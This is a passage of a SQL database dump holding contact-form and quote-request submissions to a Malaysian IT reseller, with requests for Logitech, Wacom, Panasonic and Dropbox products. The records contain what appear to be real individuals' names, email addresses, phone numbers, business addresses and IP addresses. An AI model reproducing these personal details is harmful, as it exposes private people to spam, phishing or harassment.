Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-26 16:57:24','115.164.207.199','1'),(80,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"ALAN YAP\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"yap.alan@mexsys.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0123763887\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"MEXSYS SDN BHD\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:75:\"We would like to get a quotation and brochure for WACOM Cintiq 22HD Monitor\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"08\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-27 09:39:04','42.191.229.137','1'),(81,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"ZOW HUA ERN\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"huaern.zow@redtone.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0133992573\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"REDtone Telecommunications\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:148:\"Intend to resell Logitech conference system to our customer. Do you have demo set in your office for test? Can we get lower price than retail price?\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-27 10:58:35','123.136.115.93','1'),(82,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Cheng Jia Huui\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:38:\"jiahuui.cheng@completehumannetwork.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"016 5466976\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:30:\"Complete Human Network Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:147:\"Hi Bintara. We have request from customer for 78 units of Logitech Slim Folio Keyboard for iPad 9.7&#039; (6th Gen). Can you provide a quote to us?\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"66\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-28 12:07:39','210.186.111.77','1'),(83,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"WANG LI YUAN\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"smcgcmalaysia@smcgc.co\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"01128533620\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"SMCGC (MALAYSIA) SDN BHD\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:55:\"No. B-10-7, Tkt 10 Megan Avenue II, Jalan Yap Kwan Seng\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:40:\"Logitech PTZ Pro 2, MeetUp Expansion Mic\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:97:\"I am looking forward video conference system for a small size company use. pls kindly contact me.\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-28 17:21:43','192.228.202.183','1'),(84,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"AMEER JASRIE JAMIL\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"ameerjasrie@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60103690054\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:35:\"MALAYSIAN HOUSE OF INTERNET SDN BHD\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:37:\"2nd floor,computer city,low yat plaza\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:62:\"TOUGHPAD FZ-M1, TOUGHPAD FZ-G1, TOUGHPAD FZ-A2, TOUGHPAD FZ-B2\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:73:\"i need a 10&quot; inch rugged,heavyduty 4gb tablet.any brands ur carrying\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"00\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-05 01:00:48','14.192.210.103','1'),(85,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"hasif mazlan\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"hasif.mazlan@networkfoods.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0129154850\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"Network Foods Industries\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:38:\"Need a quoatation for dropbox business\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-05 11:21:21','175.139.191.62','1'),(86,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"ANITA ISMAIL\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"anitai@wsplastics.com.au\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0177120005\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"W&amp;S PLASTICS (M) SDN BHD\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:99:\"NO.62, JLN I-PARK 1/1, KAWASAN PERINDUSTRIAN I-PARK, BANDAR INDAHPURA, KAWASAN PERINDUSTRIAN I-PARK\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:52:\"Logitech Group, Logitech Rally, Group Expansion Mics\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"26\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-05 11:56:37','1.9.117.57','1'),(87,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"ANITA ISMAIL\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"anitai@wsplastics.com.au\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0177120005\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"W&amp;S PLASTICS (M) SDN BHD\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:99:\"NO.62, JLN I-PARK 1/1, KAWASAN PERINDUSTRIAN I-PARK, BANDAR INDAHPURA, KAWASAN PERINDUSTRIAN I-PARK\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:52:\"Logitech Group, Logitech Rally, Group Expansion Mics\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two 